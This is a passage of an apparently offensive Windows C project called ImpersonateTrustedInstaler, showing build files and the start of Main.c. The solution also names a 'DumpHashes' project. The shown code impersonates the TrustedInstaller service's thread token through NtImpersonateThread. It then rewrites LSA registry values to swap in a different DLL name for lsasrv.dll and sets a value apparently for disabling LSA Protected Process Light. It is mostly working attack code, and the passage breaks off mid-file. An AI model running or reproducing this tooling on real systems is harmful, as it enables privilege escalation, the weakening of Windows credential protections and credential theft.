884 |     WrCpuRateControl,
885 |     WrCalloutStack,
886 |     WrKernel,
887 |     WrResource,
888 |     WrPushLock,
889 |     WrMutex,
890 |     WrQuantumEnd,
891 |     WrDispatchInt,
892 |     WrPreempted,
893 |     WrYieldExecution,
894 |     WrFastMutex,
895 |     WrGuardedMutex,
896 |     WrRundown,
897 |     WrAlertByThreadId,
898 |     WrDeferredPreempt,
899 |     WrPhysicalFault,
900 |     WrIoRing,
901 |     WrMdlCache,
902 |     MaximumWaitReason
903 | } KWAIT_REASON, * PKWAIT_REASON;
904 | 
905 | // https://github.com/winsiderss/systeminformer/blob/master/phnt/include/ntexapi.h#L1706
906 | typedef struct _SYSTEM_THREAD_INFORMATION
907 | {
908 |     LARGE_INTEGER KernelTime;
909 |     LARGE_INTEGER UserTime;
910 |     LARGE_INTEGER CreateTime;
911 |     ULONG WaitTime;
912 |     PVOID StartAddress;
913 |     CLIENT_ID ClientId;
914 |     KPRIORITY Priority;
915 |     KPRIORITY BasePriority;
916 |     ULONG ContextSwitches;
917 |     KTHREAD_STATE ThreadState;
918 |     KWAIT_REASON WaitReason;
919 | } SYSTEM_THREAD_INFORMATION, * PSYSTEM_THREAD_INFORMATION;
920 | 
921 | // https://github.com/winsiderss/systeminformer/blob/master/phnt/include/ntexapi.h#L1736
922 | typedef struct _SYSTEM_PROCESS_INFORMATION
923 | {
924 |     ULONG NextEntryOffset;
925 |     ULONG NumberOfThreads;
926 |     LARGE_INTEGER WorkingSetPrivateSize; // since VISTA
927 |     ULONG HardFaultCount; // since WIN7
928 |     ULONG NumberOfThreadsHighWatermark; // since WIN7
929 |     ULONGLONG CycleTime; // since WIN7
930 |     LARGE_INTEGER CreateTime;
931 |     LARGE_INTEGER UserTime;
932 |     LARGE_INTEGER KernelTime;
933 |     UNICODE_STRING ImageName;
934 |     KPRIORITY BasePriority;
935 |     HANDLE UniqueProcessId;
936 |     HANDLE InheritedFromUniqueProcessId;
937 |     ULONG HandleCount;
938 |     ULONG SessionId;
939 |     ULONG_PTR UniqueProcessKey; // since VISTA (requires SystemExtendedProcessInformation)
940 |     SIZE_T PeakVirtualSize;
941 |     SIZE_T VirtualSize;
942 |     ULONG PageFaultCount;
943 |     SIZE_T PeakWorkingSetSize;
944 |     SIZE_T WorkingSetSize;
945 |     SIZE_T QuotaPeakPagedPoolUsage;
946 |     SIZE_T QuotaPagedPoolUsage;
947 |     SIZE_T QuotaPeakNonPagedPoolUsage;
948 |     SIZE_T QuotaNonPagedPoolUsage;
949 |     SIZE_T PagefileUsage;
950 |     SIZE_T PeakPagefileUsage;
951 |     SIZE_T PrivatePageCount;
952 |     LARGE_INTEGER ReadOperationCount;
953 |     LARGE_INTEGER WriteOperationCount;
954 |     LARGE_INTEGER OtherOperationCount;
955 |     LARGE_INTEGER ReadTransferCount;
956 |     LARGE_INTEGER WriteTransferCount;
957 |     LARGE_INTEGER OtherTransferCount;
958 |     SYSTEM_THREAD_INFORMATION Threads[1]; // SystemProcessInformation
959 |     // SYSTEM_EXTENDED_THREAD_INFORMATION Threads[1]; // SystemExtendedProcessinformation
960 |     // SYSTEM_EXTENDED_THREAD_INFORMATION + SYSTEM_PROCESS_INFORMATION_EXTENSION // SystemFullProcessInformation
961 | } SYSTEM_PROCESS_INFORMATION, * PSYSTEM_PROCESS_INFORMATION;
962 | 
963 | 
964 | #endif // !STRUCTS_H
965 | 


--------------------------------------------------------------------------------
/ImpersonateTrustedInstaler.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.12.35527.113
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ImpersonateTrustedInstaler", "ImpersonateTrustedInstaler\ImpersonateTrustedInstaler.vcxproj", "{10D17572-BFE8-45DE-946B-09F7B840D62E}"
 7 | EndProject
 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Dummy", "DumpHashes\DumpHashes.vcxproj", "{A93D21B4-2ED6-4F08-BF5A-6E287CF6DE20}"
 9 | EndProject
10 | Global
11 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | 		Debug|x64 = Debug|x64
13 | 		Debug|x86 = Debug|x86
14 | 		Release|x64 = Release|x64
15 | 		Release|x86 = Release|x86
16 | 	EndGlobalSection
17 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | 		{10D17572-BFE8-45DE-946B-09F7B840D62E}.Debug|x64.ActiveCfg = Debug|x64
19 | 		{10D17572-BFE8-45DE-946B-09F7B840D62E}.Debug|x64.Build.0 = Debug|x64
20 | 		{10D17572-BFE8-45DE-946B-09F7B840D62E}.Debug|x86.ActiveCfg = Debug|Win32
21 | 		{10D17572-BFE8-45DE-946B-09F7B840D62E}.Debug|x86.Build.0 = Debug|Win32
22 | 		{10D17572-BFE8-45DE-946B-09F7B840D62E}.Release|x64.ActiveCfg = Release|x64
23 | 		{10D17572-BFE8-45DE-946B-09F7B840D62E}.Release|x64.Build.0 = Release|x64
24 | 		{10D17572-BFE8-45DE-946B-09F7B840D62E}.Release|x86.ActiveCfg = Release|Win32
25 | 		{10D17572-BFE8-45DE-946B-09F7B840D62E}.Release|x86.Build.0 = Release|Win32
26 | 		{A93D21B4-2ED6-4F08-BF5A-6E287CF6DE20}.Debug|x64.ActiveCfg = Debug|x64
27 | 		{A93D21B4-2ED6-4F08-BF5A-6E287CF6DE20}.Debug|x64.Build.0 = Debug|x64
28 | 		{A93D21B4-2ED6-4F08-BF5A-6E287CF6DE20}.Debug|x86.ActiveCfg = Debug|Win32
29 | 		{A93D21B4-2ED6-4F08-BF5A-6E287CF6DE20}.Debug|x86.Build.0 = Debug|Win32
30 | 		{A93D21B4-2ED6-4F08-BF5A-6E287CF6DE20}.Release|x64.ActiveCfg = Release|x64
31 | 		{A93D21B4-2ED6-4F08-BF5A-6E287CF6DE20}.Release|x64.Build.0 = Release|x64
32 | 		{A93D21B4-2ED6-4F08-BF5A-6E287CF6DE20}.Release|x86.ActiveCfg = Release|Win32
33 | 		{A93D21B4-2ED6-4F08-BF5A-6E287CF6DE20}.Release|x86.Build.0 = Release|Win32
34 | 	EndGlobalSection
35 | 	GlobalSection(SolutionProperties) = preSolution
36 | 		HideSolutionNode = FALSE
37 | 	EndGlobalSection
38 | EndGlobal
39 | 


--------------------------------------------------------------------------------
/ImpersonateTrustedInstaler/ImpersonateTrustedInstaler.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>17.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{10d17572-bfe8-45de-946b-09f7b840d62e}</ProjectGuid>
 25 |     <RootNamespace>ImpersonateTrustedInstaler</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v143</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v143</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v143</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v143</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <ClCompile>
 75 |       <WarningLevel>Level3</WarningLevel>
 76 |       <SDLCheck>true</SDLCheck>
 77 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 78 |       <ConformanceMode>true</ConformanceMode>
 79 |     </ClCompile>
 80 |     <Link>
 81 |       <SubSystem>Console</SubSystem>
 82 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 83 |     </Link>
 84 |   </ItemDefinitionGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <FunctionLevelLinking>true</FunctionLevelLinking>
 89 |       <IntrinsicFunctions>true</IntrinsicFunctions>
 90 |       <SDLCheck>true</SDLCheck>
 91 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 92 |       <ConformanceMode>true</ConformanceMode>
 93 |     </ClCompile>
 94 |     <Link>
 95 |       <SubSystem>Console</SubSystem>
 96 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
 97 |       <OptimizeReferences>true</OptimizeReferences>
 98 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 99 |     </Link>
100 |   </ItemDefinitionGroup>
101 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
102 |     <ClCompile>
103 |       <WarningLevel>Level3</WarningLevel>
104 |       <SDLCheck>true</SDLCheck>
105 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
106 |       <ConformanceMode>true</ConformanceMode>
107 |     </ClCompile>
108 |     <Link>
109 |       <SubSystem>Console</SubSystem>
110 |       <GenerateDebugInformation>true</GenerateDebugInformation>
111 |     </Link>
112 |   </ItemDefinitionGroup>
113 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
114 |     <ClCompile>
115 |       <WarningLevel>Level3</WarningLevel>
116 |       <FunctionLevelLinking>true</FunctionLevelLinking>
117 |       <IntrinsicFunctions>true</IntrinsicFunctions>
118 |       <SDLCheck>true</SDLCheck>
119 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
120 |       <ConformanceMode>true</ConformanceMode>
121 |     </ClCompile>
122 |     <Link>
123 |       <SubSystem>Console</SubSystem>
124 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
125 |       <OptimizeReferences>true</OptimizeReferences>
126 |       <GenerateDebugInformation>true</GenerateDebugInformation>
127 |     </Link>
128 |   </ItemDefinitionGroup>
129 |   <ItemGroup>
130 |     <ClCompile Include="Main.c" />
131 |   </ItemGroup>
132 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
133 |   <ImportGroup Label="ExtensionTargets">
134 |   </ImportGroup>
135 | </Project>


--------------------------------------------------------------------------------
/ImpersonateTrustedInstaler/ImpersonateTrustedInstaler.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="Main.c">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 | </Project>


--------------------------------------------------------------------------------
/ImpersonateTrustedInstaler/ImpersonateTrustedInstaler.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/ImpersonateTrustedInstaler/Main.c:
--------------------------------------------------------------------------------
  1 | #define UNICODE
  2 | #include <Windows.h>
  3 | #include <Winternl.h>
  4 | #include <Tlhelp32.h>
  5 | #include <strsafe.h>
  6 | #include <shlwapi.h>
  7 | #include <stdio.h>
  8 | 
  9 | #pragma comment(lib, "Shlwapi.lib")
 10 | #pragma comment(lib, "Advapi32.lib")
 11 | 
 12 | // ===============================================================================================================================================================================
 13 | 
 14 | 
 15 | #define OG_DLL_NAME_TO_SET_1001     L"lsasrv.dll"
 16 | 
 17 | //\
 18 | #define OG_DLL_NAME_TO_SET_1002     L"dpapisrv.dll"
 19 | 
 20 | 
 21 | // ===============================================================================================================================================================================
 22 | 
 23 | typedef NTSTATUS(NTAPI* fnNtImpersonateThread)(HANDLE ServerThreadHandle, HANDLE ClientThreadHandle, PSECURITY_QUALITY_OF_SERVICE SecurityQos);
 24 | 
 25 | // ===============================================================================================================================================================================
 26 | 
 27 | VOID PrintErrorMessageW(IN DWORD dwErrorCode) {
 28 | 
 29 |     LPWSTR  szMessageBuffer     = NULL;
 30 |     DWORD   dwLength            = 0x00;
 31 |     
 32 |     dwLength = FormatMessageW(
 33 |         FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM |FORMAT_MESSAGE_IGNORE_INSERTS,
 34 |         NULL,                   
 35 |         dwErrorCode,
 36 |         MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
 37 |         (LPWSTR)&szMessageBuffer, 
 38 |         0x00,                      
 39 |         NULL                   
 40 |     );
 41 | 
 42 |     if (dwLength == 0x00 || szMessageBuffer == NULL) 
 43 |     {
 44 | 		printf("[!] FormatMessageW Failed With Error: %lu\n", GetLastError());
 45 |     }
 46 |     else 
 47 |     {
 48 |         while (dwLength > 0x00 && (szMessageBuffer[dwLength - 0x01] == L'\r' || szMessageBuffer[dwLength - 0x01] == L'\n'))
 49 |         {
 50 |             szMessageBuffer[--dwLength] = L'\0';
 51 |         }
 52 | 
 53 | 		printf("[!] %ws\n", szMessageBuffer);
 54 |     }
 55 |     
 56 |     if (szMessageBuffer)
 57 |         LocalFree(szMessageBuffer);
 58 | }
 59 | 
 60 | // ===============================================================================================================================================================================
 61 | 
 62 | BOOL EnablePrivilege(IN LPCWSTR szPrivilegeName) {
 63 | 
 64 |     HANDLE				hToken      = NULL;
 65 |     TOKEN_PRIVILEGES	TokenPrivs  = { 0 };
 66 |     LUID				Luid        = { 0 };
 67 |     BOOL 				bResult     = FALSE;
 68 | 
 69 |     if (!LookupPrivilegeValueW(NULL, szPrivilegeName, &Luid)) {
 70 |         printf("[!] LookupPrivilegeValueW Failed With Error: %d \n", GetLastError());
 71 |         return FALSE;
 72 |     }
 73 | 
 74 |     if (!OpenProcessToken((HANDLE)-1, TOKEN_ADJUST_PRIVILEGES, &hToken)) {
 75 |         printf("[!] OpenProcessToken Failed With Error: %d \n", GetLastError());
 76 |         return FALSE;
 77 |     }
 78 | 
 79 |     TokenPrivs.PrivilegeCount               = 0x01;
 80 |     TokenPrivs.Privileges[0].Luid           = Luid;
 81 |     TokenPrivs.Privileges[0].Attributes     = SE_PRIVILEGE_ENABLED;
 82 | 
 83 |     if (!AdjustTokenPrivileges(hToken, FALSE, &TokenPrivs, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) {
 84 |         printf("[!] AdjustTokenPrivileges Failed With Error: %d \n", GetLastError());
 85 |         goto _END_OF_FUNC;
 86 |     }
 87 | 
 88 |     if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
 89 |         printf("[!] Not All Privileges Referenced Are Assigned To The Caller \n");
 90 |         goto _END_OF_FUNC;
 91 |     }
 92 | 
 93 |     bResult = TRUE;
 94 | 
 95 | _END_OF_FUNC:
 96 |     if (hToken)
 97 |         CloseHandle(hToken);
 98 |     return bResult;
 99 | }
100 | // ===============================================================================================================================================================================
101 | 
102 | BOOL ImpersonateTrustedInstaller() {
103 | 
104 |     SC_HANDLE                    hScm               = NULL;
105 |     SC_HANDLE                    hSvc               = NULL;
106 |     THREADENTRY32                ThreadEntry32      = { .dwSize = sizeof(THREADENTRY32) };
107 |     SERVICE_STATUS_PROCESS       ssp                = { 0 };
108 |     DWORD                        dwBytesNeeded      = 0x00,
109 |                                  dwTrustedInstTid   = 0x00;
110 |     HANDLE                       hSnap              = INVALID_HANDLE_VALUE;
111 |     HANDLE                       hTrustedInstThread = NULL;
112 |     BOOL                         bResult            = FALSE;
113 | 
114 |     if (!(hScm = OpenSCManagerW(NULL, NULL, SC_MANAGER_CONNECT))) {
115 |         wprintf(L"[!] OpenSCManager Failed With Error: %lu\n", GetLastError());
116 |         goto _END_OF_FUNC;
117 |     }
118 | 
119 |     if (!(hSvc = OpenServiceW(hScm, L"TrustedInstaller", SERVICE_QUERY_STATUS | SERVICE_START))) {
120 |         wprintf(L"[!] OpenService Failed With Error: %lu\n", GetLastError());
121 |         goto _END_OF_FUNC;
122 |     }
123 | 
124 |     if (!QueryServiceStatusEx(hSvc, SC_STATUS_PROCESS_INFO, (LPBYTE)&ssp, sizeof(ssp), &dwBytesNeeded)) {
125 |         wprintf(L"[!] QueryServiceStatusEx [%d] Failed With Error: %lu\n", __LINE__, GetLastError());
126 |         goto _END_OF_FUNC;
127 |     }
128 | 
129 |     if (ssp.dwCurrentState != SERVICE_RUNNING) {
130 |         wprintf(L"[*] TrustedInstaller State [ %u ], Starting Service...\n", ssp.dwCurrentState);
131 |         
132 |         if (!StartServiceW(hSvc, 0x00, NULL)) 
133 |         {
134 |             if (GetLastError() != ERROR_SERVICE_ALREADY_RUNNING) {
135 |                 wprintf(L"[!] StartService Failed With Error: %lu\n", GetLastError());
136 |                 goto _END_OF_FUNC;
137 |             }
138 |         }
139 |         
140 |         do {
141 |             
142 |             Sleep(200);
143 | 
144 |             if (!QueryServiceStatusEx(hSvc, SC_STATUS_PROCESS_INFO, (LPBYTE)&ssp, sizeof(ssp), &dwBytesNeeded)) {
145 |                 wprintf(L"[!] QueryServiceStatusEx [%d] Failed With Error: %lu\n", __LINE__, GetLastError());
146 |                 goto _END_OF_FUNC;
147 |             }
148 | 
149 |         } while (ssp.dwCurrentState != SERVICE_RUNNING);
150 |     }
151 | 
152 |     if (ssp.dwProcessId == 0x00) 
153 |     {
154 |         wprintf(L"[!] Could Not Resolve TrustedInstaller's PID\n");
155 |         goto _END_OF_FUNC;
156 |     }
157 | 
158 |     wprintf(L"[+] TrustedInstaller PID: %lu\n", ssp.dwProcessId);
159 | 
160 |     if ((hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0x00)) == INVALID_HANDLE_VALUE) {
161 |         wprintf(L"[!] CreateToolhelp32Snapshot Failed With Error: %lu\n", GetLastError());
162 |         goto _END_OF_FUNC;
163 |     }
164 |   
165 |     for (BOOL bOk = Thread32First(hSnap, &ThreadEntry32); bOk; bOk = Thread32Next(hSnap, &ThreadEntry32)) {
166 |         
167 |         if (ThreadEntry32.th32OwnerProcessID == ssp.dwProcessId) 
168 |         {
169 |             dwTrustedInstTid = ThreadEntry32.th32ThreadID;
170 |             break;
171 |         }
172 |     }
173 | 
174 |     if (!dwTrustedInstTid) {
175 |         wprintf(L"[!] Could Not Resolve TrustedInstaller's TID\n");
176 |         goto _END_OF_FUNC;
177 |     }
178 | 
179 |     printf("[+] Found TrustedInstaller Thread: %lu\n", dwTrustedInstTid);
180 | 
181 |     if (!(hTrustedInstThread = OpenThread(THREAD_DIRECT_IMPERSONATION | THREAD_QUERY_INFORMATION, FALSE, dwTrustedInstTid))) {
182 |        wprintf(L"[!] OpenThread Failed For TID %lu With Error: %lu\n", dwTrustedInstTid, GetLastError());
183 |        goto _END_OF_FUNC;
184 |     }
185 | 
186 |     printf("[+] Opened TrustedInstaller Thread Handle\n");
187 | 
188 |     {
189 | 		NTSTATUS    		            STATUS                  = 0x00;
190 |         HMODULE                         hNtdll                  = NULL;
191 |         fnNtImpersonateThread           pNtImpersonateThread    = NULL;
192 |         SECURITY_QUALITY_OF_SERVICE     ServiceQuality          = 
193 |         {
194 |           .Length                   = sizeof(SECURITY_QUALITY_OF_SERVICE),
195 |           .ImpersonationLevel       = SecurityImpersonation,
196 |           .ContextTrackingMode      = SECURITY_STATIC_TRACKING,
197 |           .EffectiveOnly            = FALSE
198 |         };
199 | 
200 | 		if (!(hNtdll = GetModuleHandle(TEXT("NTDLL")))) {
201 | 			wprintf(L"[!] GetModuleHandleW Failed With Error: %lu\n", GetLastError());
202 | 			goto _END_OF_FUNC;
203 | 		}
204 | 
205 |         if (!(pNtImpersonateThread = (fnNtImpersonateThread)GetProcAddress(hNtdll, "NtImpersonateThread"))) {
206 |             wprintf(L"[!] GetProcAddress Failed With Error: %lu\n", GetLastError());
207 |             goto _END_OF_FUNC;
208 |         }
209 | 
210 | 		if ((STATUS = pNtImpersonateThread((HANDLE)-2, hTrustedInstThread, &ServiceQuality)) != 0x00) {
211 | 			wprintf(L"[!] NtImpersonateThread Failed With Status: 0x%08X\n", STATUS);
212 | 			goto _END_OF_FUNC;
213 | 		}
214 |     }
215 | 
216 |     bResult = TRUE;
217 | 
218 | _END_OF_FUNC:
219 |     if (hTrustedInstThread)
220 |         CloseHandle(hTrustedInstThread);
221 |     if (hSnap != INVALID_HANDLE_VALUE) 
222 |         CloseHandle(hSnap);
223 |     if (hSvc)        
224 |         CloseServiceHandle(hSvc);
225 |     if (hScm)        
226 |         CloseServiceHandle(hScm);
227 |     return bResult;
228 | }
229 | 
230 | 
231 | // ===============================================================================================================================================================================
232 | 
233 | 
234 | BOOL EditLsaRegKey(IN LPCWSTR szRegPath, IN LPCWSTR szValueName, IN LPCWSTR szNewDllName) {
235 | 
236 |     HKEY     hKey        = NULL;
237 |     LSTATUS  Results     = 0x00;
238 |     BOOL     bResult     = FALSE;
239 | 
240 |     if ((Results = RegOpenKeyExW(HKEY_LOCAL_MACHINE, szRegPath, 0x00, KEY_SET_VALUE, &hKey)) != ERROR_SUCCESS) {
241 |         wprintf(L"[!] RegOpenKeyEx Failed For '%s' With Error: %lu\n", szRegPath, Results);
242 |         goto _END_OF_FUNC;
243 |     }
244 | 
245 |     printf("[+] Successfully opened '%S'\n", szRegPath);
246 | 
247 |     if ((Results = RegSetValueExW(hKey, szValueName, 0x00, REG_SZ, (const BYTE*)szNewDllName, (DWORD)((wcslen(szNewDllName) + 1) * sizeof(WCHAR)))) != ERROR_SUCCESS) {
248 |         wprintf(L"[!] RegSetValueExW Failed For '%s' With Error: %lu\n", szValueName, Results);
249 |         goto _END_OF_FUNC;
250 |     }
251 | 
252 |     wprintf(L"[*] Successfully Set '%s' To '%s'\n", szValueName, szNewDllName);
253 | 
254 |     RegFlushKey(hKey);
255 | 
256 |     bResult = TRUE;
257 | 
258 | _END_OF_FUNC:
259 |     if (hKey)
260 |         RegCloseKey(hKey);
261 |     return bResult;
262 | }
263 | 
264 | // ===============================================================================================================================================================================
265 | 
266 | BOOL QueryLsaRegKey(IN LPCWSTR szRegPath, IN LPCWSTR szValueName, OUT LPWSTR* szDllName) {
267 | 
268 |     HKEY     hKey           = NULL;
269 |     LSTATUS  Results        = 0x00;
270 |     DWORD    dwDllNameLen   = 0x00;
271 |     BOOL     bResult        = FALSE;
272 | 
273 |     if ((Results = RegOpenKeyExW(HKEY_LOCAL_MACHINE, szRegPath, 0x00, KEY_QUERY_VALUE, &hKey)) != ERROR_SUCCESS) {
274 |         wprintf(L"[!] RegOpenKeyEx Failed For '%s' With Error: %lu\n", szRegPath, Results);
275 |         goto _END_OF_FUNC;
276 |     }
277 | 
278 |     printf("[+] Successfully opened '%S'\n", szRegPath);
279 | 
280 |     if ((Results = RegQueryValueExW(hKey, szValueName, NULL, NULL, NULL, &dwDllNameLen)) != ERROR_SUCCESS) {
281 |         wprintf(L"[!] RegQueryValueExW Failed For '%s' With Error: %lu\n", szValueName, Results);
282 |         goto _END_OF_FUNC;
283 |     }
284 | 
285 | 	if (!(*szDllName = (LPWSTR)LocalAlloc(LPTR, dwDllNameLen))) {
286 | 		wprintf(L"[!] LocalAlloc Failed With Error: %lu\n", GetLastError());
287 | 		goto _END_OF_FUNC;
288 | 	}
289 | 
290 |     if ((Results = RegQueryValueExW(hKey, szValueName, NULL, NULL, (LPBYTE)*szDllName, &dwDllNameLen)) != ERROR_SUCCESS) {
291 |         wprintf(L"[!] RegQueryValueExW Failed For '%s' With Error: %lu\n", szValueName, Results);
292 |         goto _END_OF_FUNC;
293 |     }
294 | 
295 |     bResult = TRUE;
296 | 
297 | _END_OF_FUNC:
298 |     if (hKey)
299 |         RegCloseKey(hKey);
300 |     return bResult;
301 | }
302 | 
303 | // ===============================================================================================================================================================================
304 | 
305 | 
306 | BOOL EditProtectedProcessLight(IN LPCWSTR szRegPath, IN LPCWSTR szValueName, IN DWORD dwNewValue) {
307 |     
308 |     HKEY        hKey           = NULL;
309 |     LSTATUS     Results        = 0x00;
310 |     BOOL        bResult        = FALSE;
311 | 
312 | 
313 |     if ((Results = RegOpenKeyExW(HKEY_LOCAL_MACHINE, szRegPath, 0x00, KEY_SET_VALUE, &hKey)) != ERROR_SUCCESS) {
314 |         wprintf(L"[!] RegOpenKeyEx Failed For '%s' With Error: %lu\n", szRegPath, Results);
315 |         goto _END_OF_FUNC;
316 |     }
317 | 
318 |     printf("[+] Successfully opened '%S'\n", szRegPath);
319 | 
320 |     if ((Results = RegSetValueExW(hKey, szValueName, 0x00, REG_DWORD, (const BYTE*)&dwNewValue, (DWORD)(sizeof(DWORD)))) != ERROR_SUCCESS) {
321 |         wprintf(L"[!] RegSetValueExW Failed For '%s' With Error: %lu\n", szValueName, Results);
322 |         goto _END_OF_FUNC;
323 |     }
324 | 
